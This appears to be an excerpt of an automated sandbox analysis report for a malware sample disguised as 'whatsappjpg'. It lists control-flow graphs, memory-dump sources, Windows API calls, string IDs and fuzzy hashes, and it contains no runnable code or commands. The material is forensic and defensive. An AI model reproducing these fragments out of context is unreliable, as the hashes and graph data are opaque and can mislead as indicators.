394d89dc-394d89df 1618->1625 1619->1588 1627 394d89ef-394d89f7 1619->1627 1628 394d8a1c-394d8a1e 1620->1628 1629 394d8a06-394d8a17 1620->1629 1621->1622 1630 394d8abb-394d8abe 1622->1630 1622->1631 1633 394d88da-394d88dd 1624->1633 1634 394d88c0-394d88d5 1624->1634 1625->1617 1627->1588 1638 394d89f9-394d89fc 1627->1638 1639 394d8a25-394d8a28 1628->1639 1640 394d8a20 1628->1640 1629->1628 1641 394d8adc-394d8adf 1630->1641 1642 394d8ac0-394d8ad1 1630->1642 1635 394d88df-394d88e5 1633->1635 1636 394d88ea-394d88ed 1633->1636 1634->1633 1635->1636 1636->1607 1646 394d88ef-394d88f1 1636->1646 1637->1612 1638->1620 1639->1577 1639->1593 1640->1639 1644 394d8dc8-394d8dcb 1641->1644 1645 394d8ae5-394d8c79 1641->1645 1654 394d8e14-394d8e1b 1642->1654 1655 394d8ad7 1642->1655 1651 394d8dcd-394d8dde 1644->1651 1652 394d8de9-394d8dec 1644->1652 1696 394d8c7f-394d8c86 1645->1696 1697 394d8db2-394d8dc5 1645->1697 1649 394d88f8-394d88fb 1646->1649 1650 394d88f3 1646->1650 1649->1548 1649->1604 1650->1649 1651->1642 1662 394d8de4 1651->1662 1652->1645 1656 394d8df2-394d8df5 1652->1656 1661 394d8e20-394d8e23 1654->1661 1655->1641 1659 394d8e0f-394d8e12 1656->1659 1660 394d8df7-394d8e08 1656->1660 1659->1654 1659->1661 1660->1654 1670 394d8e0a 1660->1670 1661->1645 1664 394d8e29-394d8e2c 1661->1664 1662->1652 1666 394d8e2e-394d8e3f 1664->1666 1667 394d8e46-394d8e49 1664->1667 1666->1654 1677 394d8e41 1666->1677 1668 394d8e4b-394d8e52 1667->1668 1669 394d8e57-394d8e59 1667->1669 1668->1669 1672 394d8e5b 1669->1672 1673 394d8e60-394d8e63 1669->1673 1670->1659 1672->1673 1673->1602 1675 394d8e69-394d8e72 1673->1675 1677->1667 1698 394d8c8c-394d8cbf 1696->1698 1699 394d8d3a-394d8d41 1696->1699 1710 394d8cc4-394d8d05 1698->1710 1711 394d8cc1 1698->1711 1699->1697 1700 394d8d43-394d8d76 1699->1700 1712 394d8d78 1700->1712 1713 394d8d7b-394d8da8 1700->1713 1721 394d8d1d-394d8d24 1710->1721 1722 394d8d07-394d8d18 1710->1722 1711->1710 1712->1713 1713->1675 1713->1697 1724 394d8d2c-394d8d2e 1721->1724 1722->1675 1724->1675
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $
                                                      • API String ID: 0-3993045852
                                                      • Opcode ID: a44de0b1e85c0f3bff59f3d4206b5341841370eadaf90af106c267803fedcb7a
                                                      • Instruction ID: 393d850054bcb9509f8b21f3cc14517101f307bd6e8f97033035653c5ad599b4
                                                      • Opcode Fuzzy Hash: a44de0b1e85c0f3bff59f3d4206b5341841370eadaf90af106c267803fedcb7a
                                                      • Instruction Fuzzy Hash: B822C439E002548FEB10DBA4C5917AEBBF2EF85350F10856AD405EB366DB35ED45CBA0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1780 163e70-163ed6 1782 163f20-163f22 1780->1782 1783 163ed8-163ee3 1780->1783 1784 163f24-163f7c 1782->1784 1783->1782 1785 163ee5-163ef1 1783->1785 1794 163fc6-163fc8 1784->1794 1795 163f7e-163f89 1784->1795 1786 163f14-163f1e 1785->1786 1787 163ef3-163efd 1785->1787 1786->1784 1789 163f01-163f10 1787->1789 1790 163eff 1787->1790 1789->1789 1791 163f12 1789->1791 1790->1789 1791->1786 1796 163fca-163fe2 1794->1796 1795->1794 1797 163f8b-163f97 1795->1797 1803 163fe4-163fef 1796->1803 1804 16402c-16402e 1796->1804 1798 163fba-163fc4 1797->1798 1799 163f99-163fa3 1797->1799 1798->1796 1801 163fa7-163fb6 1799->1801 1802 163fa5 1799->1802 1801->1801 1805 163fb8 1801->1805 1802->1801 1803->1804 1806 163ff1-163ffd 1803->1806 1807 164030-16407e 1804->1807 1805->1798 1808 164020-16402a 1806->1808 1809 163fff-164009 1806->1809 1815 164084-164092 1807->1815 1808->1807 1810 16400d-16401c 1809->1810 1811 16400b 1809->1811 1810->1810 1813 16401e 1810->1813 1811->1810 1813->1808 1816 164094-16409a 1815->1816 1817 16409b-1640fb 1815->1817 1816->1817 1824 1640fd-164101 1817->1824 1825 16410b-16410f 1817->1825 1824->1825 1826 164103 1824->1826 1827 164111-164115 1825->1827 1828 16411f-164123 1825->1828 1826->1825 1827->1828 1831 164117-16411a call 160ab8 1827->1831 1829 164125-164129 1828->1829 1830 164133-164137 1828->1830 1829->1830 1832 16412b-16412e call 160ab8 1829->1832 1833 164147-16414b 1830->1833 1834 164139-16413d 1830->1834 1831->1828 1832->1830 1838 16414d-164151 1833->1838 1839 16415b-16415f 1833->1839 1834->1833 1837 16413f-164142 call 160ab8 1834->1837 1837->1833 1838->1839 1841 164153 1838->1841 1842 164161-164165 1839->1842 1843 16416f 1839->1843 1841->1839 1842->1843 1844 164167 1842->1844 1845 164170 1843->1845 1844->1843 1845->1845
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \Vom
                                                      • API String ID: 0-432560009
                                                      • Opcode ID: bc07388d4e11d21630039dfefc96601c3eeb9e7991152bcf3681fcc797c8c768
                                                      • Instruction ID: 73e92be50031c5dc2ca64408288d64c8d7ee45c41331e2700fd284f7ade94436
                                                      • Opcode Fuzzy Hash: bc07388d4e11d21630039dfefc96601c3eeb9e7991152bcf3681fcc797c8c768
                                                      • Instruction Fuzzy Hash: 36916970E00309CFDF14CFA9D8957EEBBF2AF88304F148529E415A7294EB749996CB81
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d29f8ea3ef1cf0cbeb8fba3f081886ba210b19f349bd9d4b634b707d759d160
                                                      • Instruction ID: 9cd209e8c181499226389068cc5cf2fd3250f9587dfeb52e2953c595fdb3ca76
                                                      • Opcode Fuzzy Hash: 4d29f8ea3ef1cf0cbeb8fba3f081886ba210b19f349bd9d4b634b707d759d160
                                                      • Instruction Fuzzy Hash: 86628D38B01204CFEB14DB68C5A5A9DB7F2EF88354F148569E406EB396DB35ED42CB90
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 419ca9957865652dbaa0280cfe03314ac18b0d3dce7f014aead70a0428c18034
                                                      • Instruction ID: d304a0e811b4a1e2af13abedeb3c319c1041c8fa88cd3fdf6d2a4218c1b05bf9
                                                      • Opcode Fuzzy Hash: 419ca9957865652dbaa0280cfe03314ac18b0d3dce7f014aead70a0428c18034
                                                      • Instruction Fuzzy Hash: 3C228578F001498FFB10CB68C4A179EB7B2FB89350F648566E405EB352DB35EC819BA1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc863e02301637d8e8521ba9164fc3f5ae4101aa70e0f27de8f9edccaaec5c8c
                                                      • Instruction ID: 5533224edbdff2d1ae9980e8da01eb296f0044787447c5322b80a9da88a2c7d2
                                                      • Opcode Fuzzy Hash: fc863e02301637d8e8521ba9164fc3f5ae4101aa70e0f27de8f9edccaaec5c8c
                                                      • Instruction Fuzzy Hash: B9322E34A10719CBDB15EB69C89069DB7B2FFC9300F60C66AD409BB255EF70A985CF90
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55639fb28c8592c246286f1615adcc27d31f6edfac5e6bf5fe084717a114c388
                                                      • Instruction ID: c45384c15607ae92eae622f8028b406741cd73bc720600ca9096676006005103
                                                      • Opcode Fuzzy Hash: 55639fb28c8592c246286f1615adcc27d31f6edfac5e6bf5fe084717a114c388
                                                      • Instruction Fuzzy Hash: 54B16C70E00209CFDB14CFA9DC957AEBBF2AF88314F248529D815E7394EB759895CB81

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 394A2DB6
                                                      • GetCurrentThread.KERNEL32 ref: 394A2DF3
                                                      • GetCurrentProcess.KERNEL32 ref: 394A2E30
                                                      • GetCurrentThreadId.KERNEL32 ref: 394A2E89
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845900914.00000000394A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394a0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID: TsB9
                                                      • API String ID: 2063062207-2933273711
                                                      • Opcode ID: c192af808f244bea495512d57bd0b5eb89198385972194246dbda128aa9998f3
                                                      • Instruction ID: 3d372421b96e95804a0445796cf1869d4340c543dc8d76167630927b47cc9e04
                                                      • Opcode Fuzzy Hash: c192af808f244bea495512d57bd0b5eb89198385972194246dbda128aa9998f3
                                                      • Instruction Fuzzy Hash: 725133B09116498FDB04CFAAD644BDEBBF1FF89310F20845DE049A73A0D775A980CBA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1725 394ad245-394ad2b6 1726 394ad2b8-394ad2be 1725->1726 1727 394ad2c1-394ad2c8 1725->1727 1726->1727 1728 394ad2ca-394ad2d0 1727->1728 1729 394ad2d3-394ad30b 1727->1729 1728->1729 1730 394ad313-394ad372 CreateWindowExW 1729->1730 1731 394ad37b-394ad3b3 1730->1731 1732 394ad374-394ad37a 1730->1732 1736 394ad3c0 1731->1736 1737 394ad3b5-394ad3b8 1731->1737 1732->1731 1738 394ad3c1 1736->1738 1737->1736 1738->1738
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 394AD362
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845900914.00000000394A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394a0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 242122a9d5cb78137b80a90d7fb79b708785b177420b1bc35c0961a764d911c2
                                                      • Instruction ID: a9d471faa17b68b5c47ccc60d3c5c4e5d52a1c056486e808d44b117bbc58d246
                                                      • Opcode Fuzzy Hash: 242122a9d5cb78137b80a90d7fb79b708785b177420b1bc35c0961a764d911c2
                                                      • Instruction Fuzzy Hash: 9E51C2B5D10349DFDB14CFA9D880ADEBBB5FF98340F64852AE818AB210D771A845CF91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1739 394ad250-394ad2b6 1740 394ad2b8-394ad2be 1739->1740 1741 394ad2c1-394ad2c8 1739->1741 1740->1741 1742 394ad2ca-394ad2d0 1741->1742 1743 394ad2d3-394ad372 CreateWindowExW 1741->1743 1742->1743 1745 394ad37b-394ad3b3 1743->1745 1746 394ad374-394ad37a 1743->1746 1750 394ad3c0 1745->1750 1751 394ad3b5-394ad3b8 1745->1751 1746->1745 1752 394ad3c1 1750->1752 1751->1750 1752->1752
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 394AD362
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845900914.00000000394A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394a0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 4f97ebc33c42e07148013cebf4ff158cbb1476536d83df9bd3637dd69b477f5e
                                                      • Instruction ID: b3d836b3cf11ff2d919bc3d141db47fd3105a367484618dbac24ef97d8afac65
                                                      • Opcode Fuzzy Hash: 4f97ebc33c42e07148013cebf4ff158cbb1476536d83df9bd3637dd69b477f5e
                                                      • Instruction Fuzzy Hash: F041ADB5D10349DFDB14CFAAC884ADEBBB5FF48310F64812AE818AB250D775A845CF90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1753 394aa3ac-394af9cc 1756 394afa7c-394afa9c call 394aa2e4 1753->1756 1757 394af9d2-394af9d7 1753->1757 1764 394afa9f-394afaac 1756->1764 1758 394afa2a-394afa62 CallWindowProcW 1757->1758 1759 394af9d9-394afa10 1757->1759 1762 394afa6b-394afa7a 1758->1762 1763 394afa64-394afa6a 1758->1763 1766 394afa19-394afa28 1759->1766 1767 394afa12-394afa18 1759->1767 1762->1764 1763->1762 1766->1764 1767->1766
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 394AFA51
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845900914.00000000394A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394a0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: 9576cd3ab8a9a4459cbe0c2e7176655a6d4f7c8f1177c128646100e5d8435d2d
                                                      • Instruction ID: ac4a7b33c516e905fcb8d54d6c1dad2736d7f03dec698d6bc583af8535f47a63
                                                      • Opcode Fuzzy Hash: 9576cd3ab8a9a4459cbe0c2e7176655a6d4f7c8f1177c128646100e5d8435d2d
                                                      • Instruction Fuzzy Hash: 8B414AB9A00305CFDB04CF99C888A9ABBF5FF98314F25C599D518AB321D775A841CFA0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1770 394a2f78-394a3014 DuplicateHandle 1771 394a301d-394a303a 1770->1771 1772 394a3016-394a301c 1770->1772 1772->1771
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 394A3007
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845900914.00000000394A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394a0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 69936996b90d068f53522d8d9bb003aa430c6c2627a12ad1e19a51f6acf73b1c
                                                      • Instruction ID: e5aa0b0af218124099c50705aa23f65a0011f76ca18ebf5c80f7b1c5443b2309
                                                      • Opcode Fuzzy Hash: 69936996b90d068f53522d8d9bb003aa430c6c2627a12ad1e19a51f6acf73b1c
                                                      • Instruction Fuzzy Hash: 3521E3B5D10209DFDB10CFAAD580AEEBBF4EF48310F14842AE954A3350D374A951CFA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1775 394a2f80-394a3014 DuplicateHandle 1776 394a301d-394a303a 1775->1776 1777 394a3016-394a301c 1775->1777 1777->1776
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 394A3007
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845900914.00000000394A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394a0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 6b94f7394cf914c01742080c31dbbd37d1f8352167c6f53cc0d1d9cd515efbd9
                                                      • Instruction ID: 32715c57c27b61f0f4e6fd355c284342ecada3d0c2fc3edba3faec10dd472e18
                                                      • Opcode Fuzzy Hash: 6b94f7394cf914c01742080c31dbbd37d1f8352167c6f53cc0d1d9cd515efbd9
                                                      • Instruction Fuzzy Hash: 1921C2B5901249DFDB10CFAAD984AEEBBF4EB48310F14841AE958A7350D378A950CFA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1846 163e66-163ed6 1848 163f20-163f22 1846->1848 1849 163ed8-163ee3 1846->1849 1850 163f24-163f7c 1848->1850 1849->1848 1851 163ee5-163ef1 1849->1851 1860 163fc6-163fc8 1850->1860 1861 163f7e-163f89 1850->1861 1852 163f14-163f1e 1851->1852 1853 163ef3-163efd 1851->1853 1852->1850 1855 163f01-163f10 1853->1855 1856 163eff 1853->1856 1855->1855 1857 163f12 1855->1857 1856->1855 1857->1852 1862 163fca-163fe2 1860->1862 1861->1860 1863 163f8b-163f97 1861->1863 1869 163fe4-163fef 1862->1869 1870 16402c-16402e 1862->1870 1864 163fba-163fc4 1863->1864 1865 163f99-163fa3 1863->1865 1864->1862 1867 163fa7-163fb6 1865->1867 1868 163fa5 1865->1868 1867->1867 1871 163fb8 1867->1871 1868->1867 1869->1870 1872 163ff1-163ffd 1869->1872 1873 164030-164042 1870->1873 1871->1864 1874 164020-16402a 1872->1874 1875 163fff-164009 1872->1875 1880 164049-16407e 1873->1880 1874->1873 1876 16400d-16401c 1875->1876 1877 16400b 1875->1877 1876->1876 1879 16401e 1876->1879 1877->1876 1879->1874 1881 164084-164092 1880->1881 1882 164094-16409a 1881->1882 1883 16409b-1640fb 1881->1883 1882->1883 1890 1640fd-164101 1883->1890 1891 16410b-16410f 1883->1891 1890->1891 1892 164103 1890->1892 1893 164111-164115 1891->1893 1894 16411f-164123 1891->1894 1892->1891 1893->1894 1897 164117-16411a call 160ab8 1893->1897 1895 164125-164129 1894->1895 1896 164133-164137 1894->1896 1895->1896 1898 16412b-16412e call 160ab8 1895->1898 1899 164147-16414b 1896->1899 1900 164139-16413d 1896->1900 1897->1894 1898->1896 1904 16414d-164151 1899->1904 1905 16415b-16415f 1899->1905 1900->1899 1903 16413f-164142 call 160ab8 1900->1903 1903->1899 1904->1905 1907 164153 1904->1907 1908 164161-164165 1905->1908 1909 16416f 1905->1909 1907->1905 1908->1909 1910 164167 1908->1910 1911 164170 1909->1911 1910->1909 1911->1911
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \Vom
                                                      • API String ID: 0-432560009
                                                      • Opcode ID: 8671196decd9ba56f06c24ace37c19a8c531b2f39c07fff44a46d8151b216c08
                                                      • Instruction ID: 167c659fbf3daf1d997914da84137ab1ea94de2074332092ebf27d09896a750a
                                                      • Opcode Fuzzy Hash: 8671196decd9ba56f06c24ace37c19a8c531b2f39c07fff44a46d8151b216c08
                                                      • Instruction Fuzzy Hash: 6B916C70E00309CFDF14CFA8D9957EEBBF2AF88304F148529E415A7294EB749995CB91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2009 394d7039-394d7062 2010 394d7064-394d7066 2009->2010 2011 394d706d-394d7070 2010->2011 2012 394d7068 2010->2012 2011->2010 2013 394d7072-394d7096 2011->2013 2012->2011 2016 394d70a1-394d70b1 2013->2016 2017 394d7103-394d7144 2016->2017 2018 394d70b3 2016->2018 2019 394d70b6-394d70f6 2018->2019 2024 394d70fd-394d7101 2019->2024 2025 394d70f8-394d70fb 2019->2025 2024->2017 2024->2019 2025->2017
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N
                                                      • API String ID: 0-1130791706
                                                      • Opcode ID: 3d1408a877fb13161ecd4af4562a88ca79fae09e8baaea5f57df32c4da4fae90
                                                      • Instruction ID: b85b9e8cd59ca3bd68b85b8be6dfffd432b930d33728ad103672dcd17f52d27d
                                                      • Opcode Fuzzy Hash: 3d1408a877fb13161ecd4af4562a88ca79fae09e8baaea5f57df32c4da4fae90
                                                      • Instruction Fuzzy Hash: 39215AB9F012149FEB51CF68C991AAEBBF1BB48700F108069E905E7385E735E941CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D
                                                      • API String ID: 0-2746444292
                                                      • Opcode ID: 11112472794e3da5e42e6f285f66f915d3336295f93f80f4abfb4bdd7de79bc0
                                                      • Instruction ID: 3035a5279fcf0cd5e980a8b6a17386df56a9f64b385326303fdba4744fe9d8e9
                                                      • Opcode Fuzzy Hash: 11112472794e3da5e42e6f285f66f915d3336295f93f80f4abfb4bdd7de79bc0
                                                      • Instruction Fuzzy Hash: 2511C172E05210AFCB22EFB8885419EBBF5EF49325F1904B9E801D7206EB35CD518BA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: dN9
                                                      • API String ID: 0-2170572909
                                                      • Opcode ID: e20aab125c1b4e370f10132dca493221ec66b4d44ae966b51f1d0b441c68fceb
                                                      • Instruction ID: 7622c984e25bfc3528f85c5b8a7bc7de44c2680b227c0b1bcb5d9b7862274d8e
                                                      • Opcode Fuzzy Hash: e20aab125c1b4e370f10132dca493221ec66b4d44ae966b51f1d0b441c68fceb
                                                      • Instruction Fuzzy Hash: 21E0D87DE062C46FFF11EEB08D6670A3B689B42344F1185E6C808CB343E176CD018351
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b62de145b0cd40425b0b9a365402afdac4de8b3c7e6548363ed39bd451914eae
                                                      • Instruction ID: edb50cf3c6ce70813dfb3794fef55dc63163777dfce93321c922e1f1ff25c82f
                                                      • Opcode Fuzzy Hash: b62de145b0cd40425b0b9a365402afdac4de8b3c7e6548363ed39bd451914eae
                                                      • Instruction Fuzzy Hash: 68127070700211CFDB25AB78D89536C73A6EFCA750B20992AE046DB351CF79EC979B81
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e985b9e668f66b4a9389da937f826384f24bd886d406d9cb8b0b334059b60b4
                                                      • Instruction ID: 9cebd131aecfdd3835f2a171b82fb5b130b630fe39aa907724c44a9fb265770b
                                                      • Opcode Fuzzy Hash: 0e985b9e668f66b4a9389da937f826384f24bd886d406d9cb8b0b334059b60b4
                                                      • Instruction Fuzzy Hash: 4BD16D74B00204CFDB14DBA8D994AADBBB2FF89710F248569E406E7391DB34EC52CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b1639f3f6fe94af469d96910123affc8dfc21d97b828b74598e3bc8b9ab3ae3
                                                      • Instruction ID: 76bca274cf5f911ea366a0426669aa6bf3b1bc7a7927a92775879c2d0129713a
                                                      • Opcode Fuzzy Hash: 2b1639f3f6fe94af469d96910123affc8dfc21d97b828b74598e3bc8b9ab3ae3
                                                      • Instruction Fuzzy Hash: 5CD17E38B113448FDB15DB64D8A1A9EB7F2FB88350F24856AD406EB356DB35EC42CB90
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b5dc0bf68246f77a985c089f0d9644ef70bd12e74822880928c2b33573541e5
                                                      • Instruction ID: b3475a221b22c053b670174470d7f2a44cdd9443cffc65a5536ee37d71c50720
                                                      • Opcode Fuzzy Hash: 8b5dc0bf68246f77a985c089f0d9644ef70bd12e74822880928c2b33573541e5
                                                      • Instruction Fuzzy Hash: EDC14AB1F002058FDB14DFA8E8807AEBBB1FB89310F14856AE909EB395D7749C51CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d479a664e0f63e38045d755c2a667bd28276c83e2f05514087779da698aaa7c4
                                                      • Instruction ID: b415223d3e3300d01a105f5049970853298e487a1d7a95fdb81a617a944bf8ba
                                                      • Opcode Fuzzy Hash: d479a664e0f63e38045d755c2a667bd28276c83e2f05514087779da698aaa7c4
                                                      • Instruction Fuzzy Hash: E3B16D70E00209CFDB14CFA9DC957AEBBF2AF88714F248529D814E7394EB759895CB81
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32d1c999f63f5cf23a3858ba64138aa2da728862591e666826069f2404039415
                                                      • Instruction ID: f6150709dd14352b7422c6128fb4f73180d9a11b548896ca93df119455c38ae6
                                                      • Opcode Fuzzy Hash: 32d1c999f63f5cf23a3858ba64138aa2da728862591e666826069f2404039415
                                                      • Instruction Fuzzy Hash: 6D610675F001114BEB159B7EC9A465FBAE7AFC4620B194039D80EEB361DEB5EC0287E1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0fa18d8e08a21469be2c4f40a9b89821f51ccdfe2ceea3bc71c588c93461e467
                                                      • Instruction ID: 262a07d25ccdfca4963c84f40458ace1bf146ca92387e32a6124bb3e175201cb
                                                      • Opcode Fuzzy Hash: 0fa18d8e08a21469be2c4f40a9b89821f51ccdfe2ceea3bc71c588c93461e467
                                                      • Instruction Fuzzy Hash: 3E815478B002458FDB54DFA8C5A479EBBF2AF89340F508529D40AEB355EF34EC428B91
                                                      Memory Dump Source
